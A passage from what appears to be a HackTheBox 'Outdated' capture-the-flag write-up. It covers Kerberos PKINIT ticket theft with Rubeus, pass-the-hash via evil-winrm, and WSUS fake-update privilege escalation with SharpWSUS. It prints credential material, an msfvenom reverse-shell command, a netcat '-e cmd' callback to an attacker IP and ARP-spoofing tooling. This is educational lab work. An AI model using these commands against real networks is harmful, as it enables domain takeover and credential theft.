/certificate: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 /password:"V0B7ufD3CPajvAHZ" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.1.2 [*] Action: Ask TGT[*] Using PKINIT with etype rc4_hmac and subject: CN=sflowers [*] Building AS-REQ (w/ PKINIT preauth) for: 'outdated.htb\sflowers'[*] Using domain controller: 172.16.20.1:88[+] TGT request successful![*] base64(ticket.kirbi): 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 ServiceName : krbtgt/outdated.htb ServiceRealm : OUTDATED.HTB UserName : sflowers UserRealm : OUTDATED.HTB StartTime : 8/22/2022 9:00:33 AM EndTime : 8/22/2022 7:00:33 PM RenewTill : 8/29/2022 9:00:33 AM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : dqm8D2ea7+nKWFI4Mt0fLg== ASREP (key) : 2F3711B958B9B45AF57DD21CD25B6506[*] Getting credentials using U2U CredentialInfo : Version : 0 EncryptionType : rc4_hmac CredentialData : CredentialCount : 1 NTLM : 1FCDB1F6015DCB318CC77BB2BDA14DB5All this for a sequence of 32 characters, which however will take us...
┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.175 - Outdated (win)/attack/git/msdt-follina]└─$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.11.175 -u OUTDATED\\sflowers -H '1FCDB1F6015DCB318CC77BB2BDA14DB5' -s '/ps1_scripts/' -e '/exe_files/' Evil-WinRM shell v3.4Info: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\sflowers\Documents> whoamioutdated\sflowers*Evil-WinRM* PS C:\Users\sflowers\Documents> cd ..\Desktop*Evil-WinRM* PS C:\Users\sflowers\Desktop> dir Directory: C:\Users\sflowers\DesktopMode LastWriteTime Length Name---- ------------- ------ -----a---- 8/3/2022 4:19 PM 514472 PsExec64.exe-ar--- 8/22/2022 3:05 AM 34 user.txt*Evil-WinRM* PS C:\Users\sflowers\Desktop> type user.txta******************************1...to the user flag, well, actually a new winPEAS session. By now, I'm pretty sure I know what the latest attack is.
[...] [+] WSUS [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit) [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus WUServer REG_SZ http://wsus.outdated.htb:8530 [...]Windows Local Privilege Escalation - HackTricks
Verify that the BOX is indeed vulnerable.
*Evil-WinRM* PS C:\Users\sflowers\AppData\Local\Temp\in7rud3r> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServerHKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate WUServer REG_SZ http://wsus.outdated.htb:8530*Evil-WinRM* PS C:\Users\sflowers\AppData\Local\Temp\in7rud3r> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServerHKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU UseWUServer REG_DWORD 0x1Good. Even at this point, things got a little complicated, but in the end, I came out of it.
GitHub - GoSecure/WSuspicious: WSuspicious - A tool to abuse insecure WSUS connections for privilege escalations
WSuspicious - A tool to abuse insecure WSUS connections for privilege escalations - GitHub - GoSecure/WSuspicious: WSuspicious - A tool to abuse insecure WSUS connections for privilege escalations
GoSecureThis is the tool suggested by the portal to end the attack, but I had a lot of problems. There was no PsExec64.exe provided in the sysinternal suite, which I had to download separately.
http://download.sysinternals.com/files/SysinternalsSuite.zip
*Evil-WinRM* PS C:\Users\sflowers\AppData\Local\Temp\in7rud3r> cmd /c "WSuspicious.exe /command:"" -accepteula -s -d cmd /c """"type C:\Users\Administrator\Desktop\root.txt"""""" /autoinstal"Detected WSUS Server - wsus.outdated.htbcmd.exe : + CategoryInfo : NotSpecified: (:String) [], RemoteException + FullyQualifiedErrorId : NativeCommandErrorUnhandled Exception: System.IO.FileNotFoundException: Could not find file 'C:\Users\sflowers\AppData\Local\Temp\in7rud3r\PsExec64.exe'. at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath) at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost) at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost) at System.IO.File.InternalReadAllBytes(String path, Boolean checkHost) at WSuspicious.Program.Main(String[] args)The suggested compile mode, which should embed all libraries did not work, so I had to download all the attached libraries in the bin folder as well.
*Evil-WinRM* PS C:\Users\sflowers\AppData\Local\Temp\in7rud3r> cmd /c "WSuspicious.exe /command:"" -accepteula -s -d cmd /c """"type C:\Users\Administrator\Desktop\root.txt"""""" /autoinstal"Detected WSUS Server - wsus.outdated.htbcmd.exe : + CategoryInfo : NotSpecified: (:String) [], RemoteException + FullyQualifiedErrorId : NativeCommandErrorUnhandled Exception: System.IO.FileNotFoundException: Could not load file or assembly 'Titanium.Web.Proxy, Version=3.1.1288.0, Culture=neutral, PublicKeyToken=8e41e1f1c790d7cf' or one of its dependencies. The system cannot find the file specified. at WSuspicious.Servers.Proxy.WsusProxy..ctor(String wsusHost, Byte[] payload, String payloadExecutableName, String executedCommand, Boolean debug, String fakeWSUSHost, X509Certificate2 cert) at WSuspicious.Program.Main(String[] args)And they were not few!
*Evil-WinRM* PS C:\Users\sflowers\AppData\Local\Temp\in7rud3r\wsuspicious> dir Directory: C:\Users\sflowers\AppData\Local\Temp\in7rud3r\wsuspiciousMode LastWriteTime Length Name---- ------------- ------ -----a---- 11/3/2019 11:10 PM 2859096 BouncyCastle.Crypto.dll-a---- 2/7/2019 1:24 AM 1324032 BrotliSharpLib.dll-a---- 8/22/2022 10:26 AM 514472 PsExec64.exe-a---- 8/22/2022 10:39 AM 2666 rootCert.pfx-a---- 5/15/2018 3:29 PM 27792 System.Buffers.dll-a---- 4/17/2019 6:24 PM 143920 System.Memory.dll-a---- 9/18/2018 9:38 PM 23600 System.Runtime.CompilerServices.Unsafe.dll-a---- 6/18/2019 2:08 PM 33048 System.Threading.Tasks.Extensions.dll-a---- 4/5/2020 7:03 PM 360448 Titanium.Web.Proxy.dll-a---- 8/22/2022 12:00 PM 45056 WSuspicious.exe-a---- 8/22/2022 12:00 PM 527 WSuspicious.exe.configI finally manage to start the exploit, but it doesn't seem to work.
*Evil-WinRM* PS C:\Users\sflowers\AppData\Local\Temp\in7rud3r\wsuspicious> cmd /c "WSuspicious.exe /command:"" -accepteula -s -d cmd /c """"copy C:\Users\Administrator\Desktop\root.txt C:\Users\sflowers\AppData\Local\Temp\in7rud3r\wsuspicious\root.txt"""""" /autoinstal"Detected WSUS Server - wsus.outdated.htbListening on 'ExplicitProxyEndPoint' endpoint at Ip 127.0.0.1 and port: 13337Hit any key to exit..I wait for the Windows update service to run (normally set to 24 hours, but I think in this case they made an exception and reduced the time; it would be madness otherwise). It is doubtful that the Windows PowerShell spawned by evil-winRM is suitable. I try to start it through a normal cmd, where it seems to work better, but with the same result: the waiting time seems infinite. So I try to understand why the automatic update time is set.
*Evil-WinRM* PS C:\temp\wsuspicious> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AUHKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates REG_DWORD 0x1 NoAutoUpdate REG_DWORD 0x0 AUOptions REG_DWORD 0x3 ScheduledInstallDay REG_DWORD 0x0 ScheduledInstallTime REG_DWORD 0x3 ScheduledInstallEveryWeek REG_DWORD 0x1 UseWUServer REG_DWORD 0x1HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdateWell, it seems to be madness every day at 3 a.m. I can't wait that long (the BOX clock strikes 10:22 AM). I try to force a Windows update, but it seems that it does not have the privileges (yet I am in the "WSUS Administrators" group, mha!). I try to change the time of the machine, but even in this case, I do not have the privileges to operate, and I can't even change the registry values. I seem to be at a dead end. I look for alternatives to the exploit, and I find a Python script.
GitHub - pimps/wsuxploit: This is a weaponized WSUS exploit
This is a weaponized WSUS exploit. Contribute to pimps/wsuxploit development by creating an account on GitHub.
pimpsBut I understand that it connects to the WSUS service. It didn't seem to me that it was one of the ports exposed in the nmap scan, but let's see, maybe it is hidden from the scan in some way.
C:\temp\wsuspicious>netstat -na|find "8530"netstat -na|find "8530" TCP 0.0.0.0:8530 0.0.0.0:0 LISTENING TCP [::]:8530 [::]:0 LISTENINGStrange, it seems available, let's try.
┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.175 - Outdated (win)/attack/git/wsuxploit]└─$ curl http://10.10.11.175:8530 -v* Trying 10.10.11.175:8530...* Connected to 10.10.11.175 (10.10.11.175) port 8530 (#0)> GET / HTTP/1.1> Host: 10.10.11.175:8530> User-Agent: curl/7.84.0> Accept: */*> * Mark bundle as not supporting multiuse< HTTP/1.1 200 OK< Server: Microsoft-IIS/10.0< X-Powered-By: ASP.NET< Date: Thu, 25 Aug 2022 18:29:33 GMT< Content-Length: 0< * Connection #0 to host 10.10.11.175 left intactIt seems confirmed; trying doesn't hurt. The script appears to send an executable as a payload. Let's prepare a reverse shell for Windows with msfvenom and use that.
┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.175 - Outdated (win)/attack/git/wsuxploit]└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.67 LPORT=4445 -f exe > shell-x64.exe[...][-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload[-] No arch selected, selecting arch: x64 from the payloadNo encoder specified, outputting raw payloadPayload size: 460 bytesFinal size of exe file: 7168 bytes ┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.175 - Outdated (win)/attack/git/wsuxploit]└─$ ls -latotal 36drwxr-xr-x 5 in7rud3r in7rud3r 4096 Aug 25 13:50 .drwxr-xr-x 5 in7rud3r in7rud3r 4096 Aug 25 13:27 ..drwxr-xr-x 8 in7rud3r in7rud3r 4096 Aug 25 13:27 .git-rwxr-xr-x 1 in7rud3r in7rud3r 3770 Aug 25 13:27 README.mddrwxr-xr-x 2 in7rud3r in7rud3r 4096 Aug 25 13:27 resources-rw-r--r-- 1 in7rud3r in7rud3r 7168 Aug 25 13:51 shell-x64.exedrwxr-xr-x 6 in7rud3r in7rud3r 4096 Aug 25 13:28 wsuspect-proxy-rwxr-xr-x 1 in7rud3r in7rud3r 3195 Aug 25 13:27 wsuxploit.shLet's start the script...
┌──(in7rud3r㉿kali-muletto)-[/tmp/wsuxploit]└─$ sudo ./wsuxploit.sh 10.10.11.175 10.10.14.175 8030 shell-x64.exe __ __ _____________ _______ ___ .__ .__ __ / \ / \/ _____/ | \ \/ /_____ | | ____ |__|/ |_ \ \/\/ /\_____ \| | /\ /\____ \| | / _ \| \ __\ \ / / \ | / / \| |_> > |_( <_> ) || | \__/\ / /_______ /______/ /___/\ \ __/|____/\____/|__||__| \/ \/ \_/__| by pimps[*] Preparing exploit files... File "/tmp/wsuxploit/resources/create_bgi.py", line 15 filePath = "\\\\" + get_ip_address() + "\update\script.vbs" ^SyntaxError: (unicode error) 'unicodeescape' codec can't decode bytes in position 0-1: truncated \uXXXX escape[*] Spoofing arp replies...[*] Turning on IP forwarding...[*] Set iptables rules for SYN packets...[*] Running WSUSpect proxy...2022-08-25 13:55:42+0200 [-] Log opened.2022-08-25 13:55:42+0200 [-] InterceptingProxyFactory starting on 90902022-08-25 13:55:42+0200 [-] Starting factory <intercepting_proxy.InterceptingProxyFactory object at 0x7f37a633e650>And again, after waiting for a while, nothing happens. I will continue my research and find some other interesting repositories.
Introducing SharpWSUS - Nettitude Labs
SharpWSUS is a new tool that permits lateral movement through WSUS abuse, via any comnmand and control (C2) tooling.
Phil Keeble
Ok!
GitHub - nettitude/SharpWSUS
Contribute to nettitude/SharpWSUS development by creating an account on GitHub.
nettitudeWooo, it looks like .NET solutions day. Ok, let's compile and proceed. Obviously, download the executable on the target machine.
*Evil-WinRM* PS C:\temp> ./sharpwsus locate ____ _ __ ______ _ _ ____/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) ||____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red Team[*] Action: Locate WSUS ServerWSUS Server: http://wsus.outdated.htb:8530[*] Locate completeWell, everything seems to be going well so far. Let's try a simple payload: a copy of the root flag from the folder it should be in at the root of disk c.
*Evil-WinRM* PS C:\temp> ./sharpwsus create /payload:"psexec64.exe" /args:"-accepteula -s -d cmd.exe /c \\"copy C:\Users\Administrator\Desktop\root.txt C:\root.txt\\"" /title:"Great UpdateC21" /date:2021-10-03 /kb:500123 /rating:Important /description:"Really important update" /url:"https://google.com" ____ _ __ ______ _ _ ____/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) ||____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red Team[*] Action: Create Update[*] Creating patch to use the following:[*] Payload: psexec64.exe[*] Payload Path: psexec64.exe[*] Arguments: -accepteula -s -d cmd.exe /c \\copy[*] Arguments (HTML Encoded): -accepteula -s -d cmd.exe /c \\copy################# WSUS Server Enumeration via SQL ##################ServerName, WSUSPortNumber, WSUSContentLocation-----------------------------------------------DC, 8530, c:\WSUS\WsusContentImportUpdateUpdate Revision ID: 30PrepareXMLtoClientInjectURL2DownloadDeploymentRevisionPrepareBundlePrepareBundle Revision ID: 31PrepareXMLBundletoClientDeploymentRevision[*] Update created - When ready to deploy use the following command:[*] SharpWSUS.exe approve /updateid:d89462d2-bf73-475d-a778-0ff9ea156f51 /computername:Target.FQDN /groupname:"Group Name"[*] To check on the update status use the following command:[*] SharpWSUS.exe check /updateid:d89462d2-bf73-475d-a778-0ff9ea156f51 /computername:Target.FQDN[*] To delete the update use the following command:[*] SharpWSUS.exe delete /updateid:d89462d2-bf73-475d-a778-0ff9ea156f51 /computername:Target.FQDN /groupname:"Group Name"[*] Create completeExcellent; not only does it continue in the best way, but the tool also suggests the next commands.
*Evil-WinRM* PS C:\temp> ./SharpWSUS.exe approve /updateid:d89462d2-bf73-475d-a778-0ff9ea156f51 /computername:dc.outdated.htb /groupname:"Administrators" ____ _ __ ______ _ _ ____/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) ||____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red Team[*] Action: Approve UpdateTargeting dc.outdated.htbTargetComputer, ComputerID, TargetID------------------------------------dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1Group Exists = FalseGroup Created: AdministratorsAdded Computer To GroupApproved Update[*] Approve completeGreat! I don't want to believe there weren't any hitches.
*Evil-WinRM* PS C:\temp> ./SharpWSUS.exe check /updateid:d89462d2-bf73-475d-a778-0ff9ea156f51 /computername:dc.outdated.htb ____ _ __ ______ _ _ ____/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) ||____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red Team[*] Action: Check UpdateTargeting dc.outdated.htbTargetComputer, ComputerID, TargetID------------------------------------dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1[*] Update is not installed[*] Check completeMaybe it takes a little longer.
*Evil-WinRM* PS C:\temp> ./SharpWSUS.exe check /updateid:d89462d2-bf73-475d-a778-0ff9ea156f51 /computername:dc.outdated.htb ____ _ __ ______ _ _ ____/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \ ___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) ||____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/ |_| Phil Keeble @ Nettitude Red Team[*] Action: Check UpdateTargeting dc.outdated.htbTargetComputer, ComputerID, TargetID------------------------------------dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1[*] Update is installed[*] Check completeAnd in fact, the WSUS service installs the update (so it's not only set at 3.00 AM, mha!).
*Evil-WinRM* PS C:\temp> dir \ Directory: C:\Mode LastWriteTime Length Name---- ------------- ------ ----d----- 6/15/2022 7:33 AM inetpubd----- 9/15/2018 12:19 AM PerfLogsd-r--- 8/8/2022 5:30 PM Program Filesd----- 6/17/2022 10:50 PM Program Files (x86)d----- 6/20/2022 8:01 AM Sharesd----- 8/26/2022 9:15 AM tempd-r--- 6/15/2022 10:48 PM Usersd----- 8/8/2022 6:23 PM Windowsd----- 6/16/2022 4:03 PM WSUSToo bad my payload didn't work. I tried to change the payload, and before I guessed the right one, it took me some time:
- copy C:/Users/Administrator/Desktop/root.txt C:/temp/root.txt
- net localgroup administrators sflowers /add
- I changed the group of approvers, believing that the Administrators group was wrong.
- I restarted the machine.
- c:\temp\nc64.exe -e cmd 10.10.14.127 4444 (obviously after downloading the netcat on the BOX again.)
and many others, but nothing. I tried payload combinations by doubling the number of double or single quotes, slashes, and backslashes, thinking about some Windows or Linux encoding that would conflict, but nothing. Then I was reminded of the reverse shell I had generated to use with the python script using msfvenom (shell-x64.exe), so I loaded that into the BOX, and instead of starting a cmd, I just ran the executable.
./sharpwsus create /payload:"c:\temp\psexec64.exe" /args:"-accepteula -s -d c:\\temp\\shell-x64.exe" /title:"Great UpdateC21" /date:2021-10-03 /kb:500123 /rating:Important /description:"Really important update" /url:"https://google.com"And BOOOOOM!!!
┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]└─$ nc -lvp 4445 1 ⨯listening on [any] 4445 ...connect to [10.10.14.127] from mail.outdated.htb [10.10.11.175] 56601Microsoft Windows [Version 10.0.17763.737](c) 2018 Microsoft Corporation. All rights reserved.C:\Windows\system32>whoamiwhoamint authority\systemC:\Windows\system32>type c:\users\administrator\desktop\root.txttype c:\users\administrator\desktop\root.txtb******************************2C:\Windows\system32>That's all, folks! Have a nice hacking activity and enjoy your penetration testing! See you in the next BOX!!!